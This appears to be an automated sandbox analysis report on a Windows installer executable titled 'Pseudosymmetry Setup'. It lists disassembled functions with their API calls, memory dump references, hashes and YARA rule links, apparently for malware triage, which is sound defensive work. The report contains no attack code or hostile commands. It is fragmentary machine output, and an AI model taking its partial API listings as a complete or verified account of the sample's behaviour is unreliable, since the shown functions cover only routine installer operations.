                                                                                                                                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                                                                                                                                                                                                                                • Instruction ID: 0203d41d11b8997b99186d389223a7b6b7934b4d059f66b1a69252c0c80ebb8f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6218471904745ABCB219F68DD48B4BBFF8AF01715F048A29EC95E22E1C738EA04CB65
                                                                                                                                                                                                                                                                Function 10002218 Relevance: 10.6, APIs: 7, Instructions: 136memorystringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 100022CD
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 100022F7
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1000230C
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000010), ref: 1000231B
                                                                                                                                                                                                                                                                • CLSIDFromString.OLE32(00000000,00000000), ref: 10002328
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 1000232F
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10002366
                                                                                                                                                                                                                                                                  • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012E1,?,100011AB,-000000A0), ref: 10001234
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16992325573.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16992292481.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16992356898.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16992388430.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpynlstrlen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3955009414-0
                                                                                                                                                                                                                                                                • Opcode ID: 69aff648fa357728dc284a58534689404649d34245d0df12f916c92667a5c5b3
                                                                                                                                                                                                                                                                • Instruction ID: 8b241ec9b16495ad6526e456ecf9fe23ef16db2f5f6b1e36baefbe8d682bcded
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69aff648fa357728dc284a58534689404649d34245d0df12f916c92667a5c5b3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A417C71509301EFF760DF648888B6AB7ECFB443D1F218929F946D6199DB34AA40CB61
                                                                                                                                                                                                                                                                Function 00402683 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D7
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026F3
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 0040272C
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 0040273E
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402745
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 0040275D
                                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 00402771
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3294113728-0
                                                                                                                                                                                                                                                                • Opcode ID: 49055fb6b2c3bc320b1256f847f53a0fb84ebbb1f39a9992b20644ddf58d0fb2
                                                                                                                                                                                                                                                                • Instruction ID: 3852b7668eb2638a640f728426397d6192e80a26e925a200138047876d2d45ee
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49055fb6b2c3bc320b1256f847f53a0fb84ebbb1f39a9992b20644ddf58d0fb2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96317A71C00128BBDF216FA5CD89DAE7E79EF08364F10422AF920762E0D6795D419BA9
                                                                                                                                                                                                                                                                Function 00404E7C Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00429000,00000000,0041AFD0,756A23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000,?), ref: 00404EB5
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00402FBC,00429000,00000000,0041AFD0,756A23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000), ref: 00404EC5
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00429000,00402FBC,00402FBC,00429000,00000000,0041AFD0,756A23A0), ref: 00404ED8
                                                                                                                                                                                                                                                                • SetWindowTextA.USER32(00429000,00429000), ref: 00404EEA
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F10
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F2A
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F38
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2531174081-0
                                                                                                                                                                                                                                                                • Opcode ID: da25758ff77001f8ee08d8ede5d2d983a8fe2c8000e2bc2a3511aae1abe8cb5f
                                                                                                                                                                                                                                                                • Instruction ID: bec9e42dfe10d11ae3f9da453690961036ef7877893a7332badb98976ce689fd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da25758ff77001f8ee08d8ede5d2d983a8fe2c8000e2bc2a3511aae1abe8cb5f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B218C71D00118BADF119FA5CC80E9EBFB9EF44358F00807AF944B6291C739AE40CBA8
                                                                                                                                                                                                                                                                Function 00404747 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404762
                                                                                                                                                                                                                                                                • GetMessagePos.USER32 ref: 0040476A
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404784
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404796
                                                                                                                                                                                                                                                                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047BC
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                • String ID: f
                                                                                                                                                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                                                                                                                                                                                                                                • Instruction ID: c5a6753d0d9a08ec20861e0abf538a780563573202a5f4a853919173bafec1ff
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F015275D00218BADB01DB94DC45FFEBBBCAF55711F10412BBA10B71C0C7B865018BA5
                                                                                                                                                                                                                                                                Function 00402B42 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5D
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(0010B165,00000064,0010B24F), ref: 00402B88
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00402B98
                                                                                                                                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 00402BA8
                                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BBA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • verifying installer: %d%%, xrefs: 00402B92
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                • Opcode ID: 617ddd64424c569eed37efdba56663e5011ffbcc16745b9a1190651759ad78bb
                                                                                                                                                                                                                                                                • Instruction ID: 73eba29f4f71f0575b3f4d6169dd72a4e637aea185fae63b28e602e2a4acafde
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 617ddd64424c569eed37efdba56663e5011ffbcc16745b9a1190651759ad78bb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91016770A40208BBDF249F60DD09EEE3779AB00745F008039FA06F52D0D7B5A951CF99
                                                                                                                                                                                                                                                                Function 004038DF Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetWindowTextA.USER32(00000000,Pseudosymmetry Setup), ref: 00403977
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: TextWindow
                                                                                                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\ImBm40hNZ2.exe"$1033$Pseudosymmetry Setup$XRS
                                                                                                                                                                                                                                                                • API String ID: 530164218-1932638560
                                                                                                                                                                                                                                                                • Opcode ID: f86f56a9df3fcc333aaaa54e7aa9f96eb508d0daa0343c47a2c4b7c3e9f4b4ae
                                                                                                                                                                                                                                                                • Instruction ID: 4a0247ebeee86d9d37c19e51f14e2d278c467c24f84ed2d5aa0d1d46c6847925
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f86f56a9df3fcc333aaaa54e7aa9f96eb508d0daa0343c47a2c4b7c3e9f4b4ae
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E11D475B006018BC730EF56DC909737BADEB89716368417FFC0167390C679AD028B98
                                                                                                                                                                                                                                                                Function 00402A3D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A5E
                                                                                                                                                                                                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402AA3
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402AC8
                                                                                                                                                                                                                                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                • Opcode ID: 6128ad1f95e0d45aeb4fc038169a3f4e17ade998af3df8cbe34db4d02bca8b11
                                                                                                                                                                                                                                                                • Instruction ID: 4f9eb0324db645217cd312817ce5f5f90673302cc8682bf6f7f2a23cea7074e4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6128ad1f95e0d45aeb4fc038169a3f4e17ade998af3df8cbe34db4d02bca8b11
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3114C75A00008FFDF21AF90DE49EAF3B6DEB54348B104036FA05B10A0DBB49E51AF69
                                                                                                                                                                                                                                                                Function 00401CCC Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?), ref: 00401CD0
                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                                                                                                                                                                                                                                                • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                                                                                                                                                                                                                                                • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401D1B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                • Opcode ID: 95477192b4ddec384c0924bacadda81c6fdd173c179a066830d31e5e10276181
                                                                                                                                                                                                                                                                • Instruction ID: a37ff7ddff9b943901b48b8e13d91397296dd9e34982c61b5f8f3387a39b4807
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 95477192b4ddec384c0924bacadda81c6fdd173c179a066830d31e5e10276181
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8F012B2A05115BFE701EBA4EE89DAF77BCEB44301B108576F501F2191C7749D018B79
                                                                                                                                                                                                                                                                Function 00404665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00429820,00429820,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404585,000000DF,0000040F,00000400,00000000), ref: 004046F3
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 004046FB
                                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,00429820), ref: 0040470E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                • Opcode ID: 2b51a4659b3896669eb4823acd47a2d31c81ce241aaf8c7cf193a0d5f8863a8f
                                                                                                                                                                                                                                                                • Instruction ID: 3575eb730b5e41c4f883d25dacfc3cf5faa310bf85eded31aa5be4b75c6b21fc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b51a4659b3896669eb4823acd47a2d31c81ce241aaf8c7cf193a0d5f8863a8f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97110473A001243BEB0066699C05EAF369DCBC6334F14463BFA25F61D1E9B9AD1186E9
                                                                                                                                                                                                                                                                Function 00405621 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,756A3410,00403294), ref: 00405627
                                                                                                                                                                                                                                                                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,756A3410,00403294), ref: 00405630
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00409014), ref: 00405641
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405621
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
